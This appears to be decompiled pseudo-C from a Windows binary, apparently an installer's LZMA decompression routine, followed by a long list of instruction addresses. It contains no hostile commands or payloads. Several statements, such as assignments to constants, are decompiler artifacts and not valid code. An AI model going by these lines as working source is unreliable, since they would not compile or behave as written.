                                                                                                                                                                                      							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                      							__eflags = _t258;
                                                                                                                                                                                      							0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                                      							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                                      							goto L75;
                                                                                                                                                                                      						case 0xa:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      								__eax =  *(__ebp - 4);
                                                                                                                                                                                      								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                      								 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                      								goto L132;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax =  *(__ebp - 0x28);
                                                                                                                                                                                      							goto L88;
                                                                                                                                                                                      						case 0xb:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      								__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                      								__eax =  *(__ebp - 0x20);
                                                                                                                                                                                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__eax =  *(__ebp - 0x24);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x28);
                                                                                                                                                                                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                                                                                                                      							L88:
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x2c);
                                                                                                                                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                                                                                                                      							L89:
                                                                                                                                                                                      							__eax =  *(__ebp - 4);
                                                                                                                                                                                      							 *(__ebp - 0x80) = 0x15;
                                                                                                                                                                                      							__eax =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                      							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                                                                                                                      							goto L68;
                                                                                                                                                                                      						case 0xc:
                                                                                                                                                                                      							L99:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      								 *(__ebp - 0x88) = 0xc;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							_t334 = __ebp - 0x70;
                                                                                                                                                                                      							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      							__eflags =  *_t334;
                                                                                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      							goto L101;
                                                                                                                                                                                      						case 0xd:
                                                                                                                                                                                      							goto L36;
                                                                                                                                                                                      						case 0xe:
                                                                                                                                                                                      							goto L45;
                                                                                                                                                                                      						case 0xf:
                                                                                                                                                                                      							goto L57;
                                                                                                                                                                                      						case 0x10:
                                                                                                                                                                                      							L109:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      								 *(__ebp - 0x88) = 0x10;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							_t365 = __ebp - 0x70;
                                                                                                                                                                                      							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      							__eflags =  *_t365;
                                                                                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							goto L111;
                                                                                                                                                                                      						case 0x11:
                                                                                                                                                                                      							L68:
                                                                                                                                                                                      							__esi =  *(__ebp - 0x58);
                                                                                                                                                                                      							 *(__ebp - 0x84) = 0x12;
                                                                                                                                                                                      							goto L132;
                                                                                                                                                                                      						case 0x12:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      								__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      								 *(__ebp - 0x84) = 0x13;
                                                                                                                                                                                      								__esi =  *(__ebp - 0x58) + 2;
                                                                                                                                                                                      								goto L132;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                                                      							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                                                                                                                                      							goto L130;
                                                                                                                                                                                      						case 0x13:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                      							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                      								_t469 = __ebp - 0x58;
                                                                                                                                                                                      								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                                                                                                                                      								__eflags =  *_t469;
                                                                                                                                                                                      								 *(__ebp - 0x30) = 0x10;
                                                                                                                                                                                      								 *(__ebp - 0x40) = 8;
                                                                                                                                                                                      								L144:
                                                                                                                                                                                      								 *(__ebp - 0x7c) = 0x14;
                                                                                                                                                                                      								goto L145;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax =  *(__ebp - 0x4c);
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x58);
                                                                                                                                                                                      							__eax =  *(__ebp - 0x4c) << 4;
                                                                                                                                                                                      							 *(__ebp - 0x30) = 8;
                                                                                                                                                                                      							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                                                                                                                      							L130:
                                                                                                                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      							 *(__ebp - 0x40) = 3;
                                                                                                                                                                                      							goto L144;
                                                                                                                                                                                      						case 0x14:
                                                                                                                                                                                      							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                                                                                                                      							__eax =  *(__ebp - 0x80);
                                                                                                                                                                                      							goto L140;
                                                                                                                                                                                      						case 0x15:
                                                                                                                                                                                      							__eax = 0;
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x38) - 7;
                                                                                                                                                                                      							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                                                                                      							__al = __al & 0x000000fd;
                                                                                                                                                                                      							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                                                                                                                      							goto L120;
                                                                                                                                                                                      						case 0x16:
                                                                                                                                                                                      							__eax =  *(__ebp - 0x30);
                                                                                                                                                                                      							__eflags = __eax - 4;
                                                                                                                                                                                      							if(__eax >= 4) {
                                                                                                                                                                                      								_push(3);
                                                                                                                                                                                      								_pop(__eax);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx =  *(__ebp - 4);
                                                                                                                                                                                      							 *(__ebp - 0x40) = 6;
                                                                                                                                                                                      							__eax = __eax << 7;
                                                                                                                                                                                      							 *(__ebp - 0x7c) = 0x19;
                                                                                                                                                                                      							 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      							goto L145;
                                                                                                                                                                                      						case 0x17:
                                                                                                                                                                                      							L145:
                                                                                                                                                                                      							__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      							 *(__ebp - 0x50) = 1;
                                                                                                                                                                                      							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                                                                                                                      							goto L149;
                                                                                                                                                                                      						case 0x18:
                                                                                                                                                                                      							L146:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x6c);
                                                                                                                                                                                      							if( *(__ebp - 0x6c) == 0) {
                                                                                                                                                                                      								 *(__ebp - 0x88) = 0x18;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx =  *(__ebp - 0x70);
                                                                                                                                                                                      							__eax =  *(__ebp - 0xc);
                                                                                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                                                                                                                      							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                                                                                                                      							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							_t484 = __ebp - 0x70;
                                                                                                                                                                                      							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                                                                                                                      							__eflags =  *_t484;
                                                                                                                                                                                      							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                                                                                                                      							L148:
                                                                                                                                                                                      							_t487 = __ebp - 0x48;
                                                                                                                                                                                      							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                      							__eflags =  *_t487;
                                                                                                                                                                                      							L149:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                      							if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                      								__ecx =  *(__ebp - 0x40);
                                                                                                                                                                                      								__ebx =  *(__ebp - 0x50);
                                                                                                                                                                                      								0 = 1;
                                                                                                                                                                                      								__eax = 1 << __cl;
                                                                                                                                                                                      								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                                                                                                                      								__eax =  *(__ebp - 0x7c);
                                                                                                                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      								goto L140;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax =  *(__ebp - 0x50);
                                                                                                                                                                                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                      							__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      							__esi = __edx + __eax;
                                                                                                                                                                                      							 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      							__ax =  *__esi;
                                                                                                                                                                                      							__edi = __ax & 0x0000ffff;
                                                                                                                                                                                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                                                                                                                      							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      							if( *(__ebp - 0xc) >= __ecx) {
                                                                                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                                                                                                                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                                                                                                                      								__cx = __ax;
                                                                                                                                                                                      								__cx = __ax >> 5;
                                                                                                                                                                                      								__eax = __eax - __ecx;
                                                                                                                                                                                      								__edx = __edx + 1;
                                                                                                                                                                                      								__eflags = __edx;
                                                                                                                                                                                      								 *__esi = __ax;
                                                                                                                                                                                      								 *(__ebp - 0x50) = __edx;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								 *(__ebp - 0x10) = __ecx;
                                                                                                                                                                                      								0x800 = 0x800 - __edi;
                                                                                                                                                                                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                                                                                                                      								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                      								 *__esi = __cx;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      								goto L148;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								goto L146;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						case 0x19:
                                                                                                                                                                                      							__eflags = __ebx - 4;
                                                                                                                                                                                      							if(__ebx < 4) {
                                                                                                                                                                                      								 *(__ebp - 0x2c) = __ebx;
                                                                                                                                                                                      								L119:
                                                                                                                                                                                      								_t393 = __ebp - 0x2c;
                                                                                                                                                                                      								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                                                                                                                      								__eflags =  *_t393;
                                                                                                                                                                                      								L120:
                                                                                                                                                                                      								__eax =  *(__ebp - 0x2c);
                                                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                                                      								if(__eax == 0) {
                                                                                                                                                                                      									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                                                                                                                      									goto L170;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags = __eax -  *(__ebp - 0x60);
                                                                                                                                                                                      								if(__eax >  *(__ebp - 0x60)) {
                                                                                                                                                                                      									goto L171;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                                                                                                                      								__eax =  *(__ebp - 0x30);
                                                                                                                                                                                      								_t400 = __ebp - 0x60;
                                                                                                                                                                                      								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                                                                                                                      								__eflags =  *_t400;
                                                                                                                                                                                      								goto L123;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__ecx = __ebx;
                                                                                                                                                                                      							__eax = __ebx;
                                                                                                                                                                                      							__ecx = __ebx >> 1;
                                                                                                                                                                                      							__eax = __ebx & 0x00000001;
                                                                                                                                                                                      							__ecx = (__ebx >> 1) - 1;
                                                                                                                                                                                      							__al = __al | 0x00000002;
                                                                                                                                                                                      							__eax = (__ebx & 0x00000001) << __cl;
                                                                                                                                                                                      							__eflags = __ebx - 0xe;
                                                                                                                                                                                      							 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      							if(__ebx >= 0xe) {
                                                                                                                                                                                      								__ebx = 0;
                                                                                                                                                                                      								 *(__ebp - 0x48) = __ecx;
                                                                                                                                                                                      								L102:
                                                                                                                                                                                      								__eflags =  *(__ebp - 0x48);
                                                                                                                                                                                      								if( *(__ebp - 0x48) <= 0) {
                                                                                                                                                                                      									__eax = __eax + __ebx;
                                                                                                                                                                                      									 *(__ebp - 0x40) = 4;
                                                                                                                                                                                      									 *(__ebp - 0x2c) = __eax;
                                                                                                                                                                                      									__eax =  *(__ebp - 4);
                                                                                                                                                                                      									__eax =  *(__ebp - 4) + 0x644;
                                                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                                                      									L108:
                                                                                                                                                                                      									__ebx = 0;
                                                                                                                                                                                      									 *(__ebp - 0x58) = __eax;
                                                                                                                                                                                      									 *(__ebp - 0x50) = 1;
                                                                                                                                                                                      									 *(__ebp - 0x44) = 0;
                                                                                                                                                                                      									 *(__ebp - 0x48) = 0;
                                                                                                                                                                                      									L112:
                                                                                                                                                                                      									__eax =  *(__ebp - 0x40);
                                                                                                                                                                                      									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                                                                                                                      									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                                                                                                                      										_t391 = __ebp - 0x2c;
                                                                                                                                                                                      										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                                                                                                                      										__eflags =  *_t391;
                                                                                                                                                                                      										goto L119;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eax =  *(__ebp - 0x50);
                                                                                                                                                                                      									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                                                                                                                      									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                                                                                                                      									__eax =  *(__ebp - 0x58);
                                                                                                                                                                                      									__esi = __edi + __eax;
                                                                                                                                                                                      									 *(__ebp - 0x54) = __esi;
                                                                                                                                                                                      									__ax =  *__esi;
                                                                                                                                                                                      									__ecx = __ax & 0x0000ffff;
                                                                                                                                                                                      									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                                                                                                                      									__eflags =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                      									if( *(__ebp - 0xc) >= __edx) {
                                                                                                                                                                                      										__ecx = 0;
                                                                                                                                                                                      										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                                                                                                                      										__ecx = 1;
                                                                                                                                                                                      										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                                                                                                                      										__ebx = 1;
                                                                                                                                                                                      										__ecx =  *(__ebp - 0x48);
                                                                                                                                                                                      										__ebx = 1 << __cl;
                                                                                                                                                                                      										__ecx = 1 << __cl;
                                                                                                                                                                                      										__ebx =  *(__ebp - 0x44);
                                                                                                                                                                                      										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                                                                                                                      										__cx = __ax;
                                                                                                                                                                                      										__cx = __ax >> 5;
                                                                                                                                                                                      										__eax = __eax - __ecx;
                                                                                                                                                                                      										__edi = __edi + 1;
                                                                                                                                                                                      										__eflags = __edi;
                                                                                                                                                                                      										 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      										 *__esi = __ax;
                                                                                                                                                                                      										 *(__ebp - 0x50) = __edi;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										 *(__ebp - 0x10) = __edx;
                                                                                                                                                                                      										0x800 = 0x800 - __ecx;
                                                                                                                                                                                      										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                                                                                                                      										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                                                                                                                      										 *__esi = __dx;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      										L111:
                                                                                                                                                                                      										_t368 = __ebp - 0x48;
                                                                                                                                                                                      										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                                                                                                                      										__eflags =  *_t368;
                                                                                                                                                                                      										goto L112;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										goto L109;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__ecx =  *(__ebp - 0xc);
                                                                                                                                                                                      								__ebx = __ebx + __ebx;
                                                                                                                                                                                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                                                                                                                      								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                      								 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                                                                                                                      									__ecx =  *(__ebp - 0x10);
                                                                                                                                                                                      									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                                                                                                                      									__ebx = __ebx | 0x00000001;
                                                                                                                                                                                      									__eflags = __ebx;
                                                                                                                                                                                      									 *(__ebp - 0x44) = __ebx;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                                                                                                                      								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                                                                                                                      									L101:
                                                                                                                                                                                      									_t338 = __ebp - 0x48;
                                                                                                                                                                                      									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                                                                                                                      									__eflags =  *_t338;
                                                                                                                                                                                      									goto L102;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									goto L99;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__edx =  *(__ebp - 4);
                                                                                                                                                                                      							__eax = __eax - __ebx;
                                                                                                                                                                                      							 *(__ebp - 0x40) = __ecx;
                                                                                                                                                                                      							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                                                                                                                      							goto L108;
                                                                                                                                                                                      						case 0x1a:
                                                                                                                                                                                      							goto L55;
                                                                                                                                                                                      						case 0x1b:
                                                                                                                                                                                      							L75:
                                                                                                                                                                                      							__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                      							if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                      								 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                      								goto L170;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      							__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                      							if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      								__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							__edx =  *(__ebp - 8);
                                                                                                                                                                                      							__cl =  *(__eax + __edx);
                                                                                                                                                                                      							__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      							 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                      							 *(__eax + __edx) = __cl;
                                                                                                                                                                                      							__eax = __eax + 1;
                                                                                                                                                                                      							__edx = 0;
                                                                                                                                                                                      							_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                      							__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                      							__edx = _t274;
                                                                                                                                                                                      							__eax =  *(__ebp - 0x68);
                                                                                                                                                                                      							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                      							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                      							_t283 = __ebp - 0x64;
                                                                                                                                                                                      							 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                      							__eflags =  *_t283;
                                                                                                                                                                                      							 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                      							goto L79;
                                                                                                                                                                                      						case 0x1c:
                                                                                                                                                                                      							while(1) {
                                                                                                                                                                                      								L123:
                                                                                                                                                                                      								__eflags =  *(__ebp - 0x64);
                                                                                                                                                                                      								if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                      									break;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                      								__eflags = __eax -  *(__ebp - 0x74);
                                                                                                                                                                                      								if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                      									__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								__edx =  *(__ebp - 8);
                                                                                                                                                                                      								__cl =  *(__eax + __edx);
                                                                                                                                                                                      								__eax =  *(__ebp - 0x14);
                                                                                                                                                                                      								 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                      								 *(__eax + __edx) = __cl;
                                                                                                                                                                                      								__eax = __eax + 1;
                                                                                                                                                                                      								__edx = 0;
                                                                                                                                                                                      								_t414 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                      								__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                      								__edx = _t414;
                                                                                                                                                                                      								__eax =  *(__ebp - 0x68);
                                                                                                                                                                                      								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                      								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                      								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                                                                                                                      								__eflags =  *(__ebp - 0x30);
                                                                                                                                                                                      								 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                      								 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                      								if( *(__ebp - 0x30) > 0) {
                                                                                                                                                                                      									continue;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									goto L80;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							 *(__ebp - 0x88) = 0x1c;
                                                                                                                                                                                      							goto L170;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}













                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406af2
                                                                                                                                                                                      0x00406af2
                                                                                                                                                                                      0x00406af7
                                                                                                                                                                                      0x00406b6e
                                                                                                                                                                                      0x00406b75
                                                                                                                                                                                      0x00406b7f
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x0040715e
                                                                                                                                                                                      0x00407161
                                                                                                                                                                                      0x00407161
                                                                                                                                                                                      0x00407167
                                                                                                                                                                                      0x0040716d
                                                                                                                                                                                      0x00407173
                                                                                                                                                                                      0x0040718d
                                                                                                                                                                                      0x00407190
                                                                                                                                                                                      0x00407196
                                                                                                                                                                                      0x004071a1
                                                                                                                                                                                      0x004071a3
                                                                                                                                                                                      0x00407175
                                                                                                                                                                                      0x00407175
                                                                                                                                                                                      0x00407184
                                                                                                                                                                                      0x00407188
                                                                                                                                                                                      0x00407188
                                                                                                                                                                                      0x004071ad
                                                                                                                                                                                      0x004071d4
                                                                                                                                                                                      0x004071d4
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x004071da
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004071af
                                                                                                                                                                                      0x004071af
                                                                                                                                                                                      0x004071b3
                                                                                                                                                                                      0x00407362
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407362
                                                                                                                                                                                      0x004071bf
                                                                                                                                                                                      0x004071c6
                                                                                                                                                                                      0x004071ce
                                                                                                                                                                                      0x004071d1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004071d1
                                                                                                                                                                                      0x00406af9
                                                                                                                                                                                      0x00406af9
                                                                                                                                                                                      0x00406afd
                                                                                                                                                                                      0x00406b05
                                                                                                                                                                                      0x00406b08
                                                                                                                                                                                      0x00406b0a
                                                                                                                                                                                      0x00406b0d
                                                                                                                                                                                      0x00406b0f
                                                                                                                                                                                      0x00406b14
                                                                                                                                                                                      0x00406b17
                                                                                                                                                                                      0x00406b1e
                                                                                                                                                                                      0x00406b25
                                                                                                                                                                                      0x00406b28
                                                                                                                                                                                      0x00406b33
                                                                                                                                                                                      0x00406b3b
                                                                                                                                                                                      0x00406b3b
                                                                                                                                                                                      0x00406b35
                                                                                                                                                                                      0x00406b35
                                                                                                                                                                                      0x00406b35
                                                                                                                                                                                      0x00406b2a
                                                                                                                                                                                      0x00406b2a
                                                                                                                                                                                      0x00406b2a
                                                                                                                                                                                      0x00406b42
                                                                                                                                                                                      0x00406b60
                                                                                                                                                                                      0x00406b62
                                                                                                                                                                                      0x00406d35
                                                                                                                                                                                      0x00406d35
                                                                                                                                                                                      0x00406d38
                                                                                                                                                                                      0x00406d3b
                                                                                                                                                                                      0x00406d3e
                                                                                                                                                                                      0x00406d41
                                                                                                                                                                                      0x00406d44
                                                                                                                                                                                      0x00406d47
                                                                                                                                                                                      0x00406d4a
                                                                                                                                                                                      0x00406d4d
                                                                                                                                                                                      0x00406d53
                                                                                                                                                                                      0x00406d6b
                                                                                                                                                                                      0x00406d6e
                                                                                                                                                                                      0x00406d71
                                                                                                                                                                                      0x00406d74
                                                                                                                                                                                      0x00406d74
                                                                                                                                                                                      0x00406d77
                                                                                                                                                                                      0x00406d7d
                                                                                                                                                                                      0x00406d55
                                                                                                                                                                                      0x00406d55
                                                                                                                                                                                      0x00406d5d
                                                                                                                                                                                      0x00406d62
                                                                                                                                                                                      0x00406d64
                                                                                                                                                                                      0x00406d66
                                                                                                                                                                                      0x00406d66
                                                                                                                                                                                      0x00406d87
                                                                                                                                                                                      0x00406d8a
                                                                                                                                                                                      0x00406d2d
                                                                                                                                                                                      0x00406d33
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d8c
                                                                                                                                                                                      0x00406d08
                                                                                                                                                                                      0x00406d0c
                                                                                                                                                                                      0x00407314
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00407314
                                                                                                                                                                                      0x00406d12
                                                                                                                                                                                      0x00406d15
                                                                                                                                                                                      0x00406d18
                                                                                                                                                                                      0x00406d1c
                                                                                                                                                                                      0x00406d1f
                                                                                                                                                                                      0x00406d25
                                                                                                                                                                                      0x00406d27
                                                                                                                                                                                      0x00406d27
                                                                                                                                                                                      0x00406d2a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00406d2a
                                                                                                                                                                                      0x00406b44
